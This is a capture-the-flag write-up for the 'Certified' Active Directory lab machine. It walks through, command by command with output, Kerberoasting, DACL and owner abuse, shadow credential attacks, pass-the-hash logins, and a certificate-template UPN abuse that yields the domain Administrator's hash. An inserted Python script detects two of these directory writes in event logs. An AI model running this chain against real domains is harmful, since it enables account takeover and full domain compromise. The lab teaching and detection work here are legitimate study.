Certified is a medium-difficulty machine.
Skill Learned: Active Directory, Shadow Credential & CA Attacks
Machine Information:
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
export box=10.10.11.41
export domain=certified.htb
export machine=DC01
export user=judith.mader
export pass=judith09
┌──(glmx㉿kali)-[~/htb/certified]
└─$ sudo nmap -p- -sV -sC -O -Pn --disable-arp-ping $box
[sudo] password for glmx:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 15:54 WIB
Nmap scan report for 10.10.11.41
Host is up (0.068s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-29 15:44:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:22+00:00; +6h45m05s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:21+00:00; +6h45m05s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:22+00:00; +6h45m05s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:21+00:00; +6h45m05s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49738/tcp open msrpc Microsoft Windows RPC
49773/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-29T15:45:42
|_ start_date: N/A
|_clock-skew: mean: 6h45m04s, deviation: 0s, median: 6h45m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
┌──(glmx㉿kali)-[~]
└─$ ldapire.py $box
------------------------------------------------------------
Server Information
------------------------------------------------------------
• IP Address : 10.10.11.41
• Domain Name : certified.htb
• Server Name : DC01
• Forest Level: 7
• Domain Level: 7
Functional level numbers and the corresponding Windows Server operating systems:
0: Windows 2000
1: Windows Server 2003 Interim
2: Windows Server 2003
3: Windows Server 2008
4: Windows Server 2008 R2
5: Windows Server 2012
6: Windows Server 2012 R2
7: Windows Server 2016
8: Windows Server 2019
9: Windows Server 2022
Full Server Name:
CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=certified,DC=htb
Synchronizing the clock with the machine before Kerberos exploitation (the scan showed a clock skew of about 6h45m):
┌──(glmx㉿kali)-[~]
└─$ sudo ntpdate -s $domain
┌──(glmx㉿kali)-[~]
└─$ netexec ldap $box -u $user -p $pass --asreproast asrep.txt
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 [*] Total of records returned 3
LDAP 10.10.11.41 389 DC01 No entries found!
Kerberoasting to obtain the management_svc service ticket hash:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec ldap $machine.$domain -u $user -p $pass --kerberoasting kerb.out
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Bypassing disabled account krbtgt
LDAP 10.10.11.41 389 DC01 [*] Total of records returned 1
LDAP 10.10.11.41 389 DC01 sAMAccountName: management_svc memberOf: CN=Management,CN=Users,DC=certified,DC=htb pwdLastSet: 2024-05-13 22:30:51.476756 lastLogon:2024-12-29 16:49:08.722184
LDAP 10.10.11.41 389 DC01 $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$a94347ada648c1ec......611a55d2889aaa493bb9ab2f4ee1
Cracking with Hashcat, but it failed.
└─$ smbclient -U $user "\\\\$box\\SYSVOL"
Password for [WORKGROUP\judith.mader]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 13 22:02:13 2024
.. D 0 Mon May 13 22:02:13 2024
certified.htb Dr 0 Mon May 13 22:02:13 2024
5085183 blocks of size 4096. 1272184 blocks available
┌──(glmx㉿kali)-[~/htb/certified]
└─$ smbclient -U $user "\\\\$box\\NETLOGON"
Password for [WORKGROUP\judith.mader]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 13 22:02:13 2024
.. D 0 Mon May 13 22:02:13 2024
5085183 blocks of size 4096. 1272184 blocks available
Nothing interesting found.
Enumerate Users:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-lookupsid $domain/$user@$machine.$domain -domain-sids
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at DC01.certified.htb
[*] StringBinding ncacn_np:DC01.certified.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-729746778-2675978091-3820388244
498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CERTIFIED\Administrator (SidTypeUser)
501: CERTIFIED\Guest (SidTypeUser)
502: CERTIFIED\krbtgt (SidTypeUser)
512: CERTIFIED\Domain Admins (SidTypeGroup)
513: CERTIFIED\Domain Users (SidTypeGroup)
514: CERTIFIED\Domain Guests (SidTypeGroup)
515: CERTIFIED\Domain Computers (SidTypeGroup)
516: CERTIFIED\Domain Controllers (SidTypeGroup)
517: CERTIFIED\Cert Publishers (SidTypeAlias)
518: CERTIFIED\Schema Admins (SidTypeGroup)
519: CERTIFIED\Enterprise Admins (SidTypeGroup)
520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup)
521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup)
522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup)
525: CERTIFIED\Protected Users (SidTypeGroup)
526: CERTIFIED\Key Admins (SidTypeGroup)
527: CERTIFIED\Enterprise Key Admins (SidTypeGroup)
553: CERTIFIED\RAS and IAS Servers (SidTypeAlias)
571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias)
572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias)
1000: CERTIFIED\DC01$ (SidTypeUser)
1101: CERTIFIED\DnsAdmins (SidTypeAlias)
1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup)
1103: CERTIFIED\judith.mader (SidTypeUser)
1104: CERTIFIED\Management (SidTypeGroup)
1105: CERTIFIED\management_svc (SidTypeUser)
1106: CERTIFIED\ca_operator (SidTypeUser)
1601: CERTIFIED\alexander.huges (SidTypeUser)
1602: CERTIFIED\harry.wilson (SidTypeUser)
1603: CERTIFIED\gregory.cameron (SidTypeUser)
Bloodhound Collection
Failed using netexec:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec ldap $machine.$domain -u $user -p $pass --bloodhound --collection All
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, rdp, container, acl, dcom, group, psremote, trusts, session, localadmin
LDAP 10.10.11.41 389 DC01 [-] Could not find a domain controller. Consider specifying a domain and/or DNS server.
Succeeded using bloodhound-python:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ bloodhound-python -dc $machine.$domain -c All -u $user -p $pass -d $domain -ns $box
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 16S
Making Judith the owner of the Management group, granting herself WriteMembers, and adding herself as a member:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-owneredit -action write -new-owner $user -target-sid 'S-1-5-21-729746778-2675978091-3820388244-1104' $domain/$user:$pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
...
...
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal $user -target-sid 'S-1-5-21-729746778-2675978091-3820388244-1104' $domain/$user:$pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
...
...
[*] DACL backed up to dacledit-20241230-000950.bak
[*] DACL modified successfully!
┌──(glmx㉿kali)-[~/htb/certified]
└─$ net rpc group addmem "Management" $user -U $domain/$user%$pass -S $box
┌──(glmx㉿kali)-[~/htb/certified]
└─$ net rpc group members "Management" -U $domain/$user%$pass -S $box
CERTIFIED\judith.mader
CERTIFIED\management_svc
Shadow Credential attack against "Management_svc":
┌──(whisker)─(glmx㉿kali)-[~/htb/certified/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d $domain -u $user -p $pass --target "MANAGEMENT_SVC" --action "add" --filename newCert --export PEM
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 87750fee-e646-3374-d10e-eaf6f03383aa
[*] Updating the msDS-KeyCredentialLink attribute of MANAGEMENT_SVC
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PEM certificate at path: newCert_cert.pem
[+] Saved PEM private key at path: newCert_priv.pem
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Request TGT
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem newCert_cert.pem -key-pem newCert_priv.pem $domain/MANAGEMENT_SVC MANAGEMENT_SVC.ccache
2024-12-30 00:26:55,095 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-12-30 00:26:55,110 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2024-12-30 00:27:18,624 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-12-30 00:27:18,624 minikerberos INFO c****d
INFO:minikerberos:c***d
2024-12-30 00:27:18,626 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
Request the NT hash of user "MANAGEMENT_SVC":
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/getnthash.py -key c***d $domain/MANAGEMENT_SVC
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
/home/glmx/htb/certified/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/glmx/htb/certified/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
a***4
Tried cracking with Hashcat and John; no success.
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ export hash=a***4 \
> export user1=MANAGEMENT_SVC
Verify and log in using the hash:
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user1 -H $hash
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\MANAGEMENT_SVC:a***4
┌──(glmx㉿kali)-[~/htb/certified]
└─$ evil-winrm -i $box -u $user1 -H $hash
*Evil-WinRM* PS C:\Users\management_svc\Documents> ls
*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
9***5
In BloodHound, the edge between MANAGEMENT_SVC (service account) and CA_OPERATOR (operator account) is labelled "GenericAll", meaning MANAGEMENT_SVC has full control over CA_OPERATOR.
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 pywhisker/pywhisker/pywhisker.py -d $domain -u $user1 -H :$hash --target "CA_OPERATOR" --action "add" --filename CACert --export PEM
[*] Searching for the target account
[*] Target user found: CN=operator ca,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: d57f322c-64e6-bb9d-4dfc-944932154082
[*] Updating the msDS-KeyCredentialLink attribute of CA_OPERATOR
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PEM certificate at path: CACert_cert.pem
[+] Saved PEM private key at path: CACert_priv.pem
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem CACert_cert.pem -key-pem CACert_priv.pem $domain/CA_OPERATOR CA_OPERATOR.ccache
2024-12-30 01:05:01,351 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-12-30 01:05:01,368 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2024-12-30 01:05:24,936 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-12-30 01:05:24,936 minikerberos INFO 2***4
INFO:minikerberos:2***4
2024-12-30 01:05:24,940 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export KRB5CCNAME=CA_OPERATOR.ccache
export user2=ca_operator
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/getnthash.py -key $hash $domain/$user2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
/home/glmx/htb/certified/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/glmx/htb/certified/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
2***2
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user2 -H $hash
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:2***2
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user2 -H $hash --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:2***2
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad find -vulnerable -u $user2@$domain -hashes :$caHash -dc-ip $box
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20241230054616_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241230054616_Certipy.txt'
[*] Saved JSON output to '20241230054616_Certipy.json'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export svcHash=a***4
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad account update -username management_svc@$domain -hashes :$svchash -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad req -username ca_operator@$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad account update -username management_svc@$domain -hashes :$svchash -user ca_operator -upn ca_operator@$domain
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad auth -pfx administrator.pfx -domain $domain
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': a***e:0****4
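The two directory writes this chain depends on, adding a KeyCredential to msDS-KeyCredentialLink and pointing ca_operator's userPrincipalName at Administrator, both surface as Directory Service Changes events (Event ID 5136) when object auditing is enabled. The script below is an added defender-side example, not part of the original writeup; the event records, the DN-to-account map and the account list are constructed, with field names following the 5136 EventData schema.

```python
"""Triage constructed Event ID 5136 records for shadow-credential and UPN-hijack writes."""

VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

# Constructed: sAMAccountNames present in the directory.
KNOWN_ACCOUNTS = {"administrator", "judith.mader", "management_svc", "ca_operator"}

# Constructed: ObjectDN -> sAMAccountName (DNs as shown by pywhisker above).
DN_TO_SAM = {
    "CN=management service,CN=Users,DC=certified,DC=htb": "management_svc",
    "CN=operator ca,CN=Users,DC=certified,DC=htb": "ca_operator",
}

# Constructed sample events mirroring the writes performed in the chain.
SAMPLE_EVENTS = [
    {"SubjectUserName": "judith.mader", "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED,
     "AttributeValue": "B:828:<constructed-keycredential-blob>:CN=management service,CN=Users,DC=certified,DC=htb"},
    {"SubjectUserName": "management_svc", "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "Administrator"},
    {"SubjectUserName": "management_svc", "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "ca_operator@certified.htb"},  # restore step: UPN names the account itself
    {"SubjectUserName": "DC01$", "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "HOST/dc01"},  # benign noise
]


def _target(event, dn_to_sam):
    return dn_to_sam.get(event["ObjectDN"], event["ObjectDN"])


def flag_shadow_credential(event, dn_to_sam):
    """KeyCredential added to an account by a principal other than the account itself."""
    if event["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
        return None
    if event["OperationType"] != VALUE_ADDED:
        return None
    target, writer = _target(event, dn_to_sam), event["SubjectUserName"]
    if writer.lower() == target.lower():
        return None  # self-enrolment (e.g. Windows Hello for Business) is expected
    return f"shadow-credential: {writer} added a KeyCredential to {target}"


def flag_upn_hijack(event, dn_to_sam, known_accounts):
    """userPrincipalName set to a value whose user part names a different existing account."""
    if event["AttributeLDAPDisplayName"].lower() != "userprincipalname":
        return None
    if event["OperationType"] != VALUE_ADDED:
        return None
    target = _target(event, dn_to_sam)
    upn_user = event["AttributeValue"].split("@", 1)[0].lower()
    if upn_user == target.lower() or upn_user not in known_accounts:
        return None
    return (f"upn-hijack: {event['SubjectUserName']} set UPN of {target} to "
            f"'{event['AttributeValue']}' (collides with account {upn_user})")


def triage(events, dn_to_sam, known_accounts):
    """Run both detections over a batch of 5136 records and return the findings."""
    findings = []
    for ev in events:
        for finding in (flag_shadow_credential(ev, dn_to_sam),
                        flag_upn_hijack(ev, dn_to_sam, known_accounts)):
            if finding:
                findings.append(finding)
    return findings
```

The UPN check is what catches the ESC9-style mapping abuse shown above (a certificate issued with UPN 'Administrator' and no object SID); the restore write that sets the UPN back to ca_operator@certified.htb is not flagged.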
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export admHash=0***4 \
export user3=administrator
┌──(glmx㉿kali)-[~/htb/certified]
└─$ evil-winrm -i $box -u $user3 -H $admHash
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d<root_flag>a
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\Users\management_svc\Desktop\user.txt
9<user_flag>5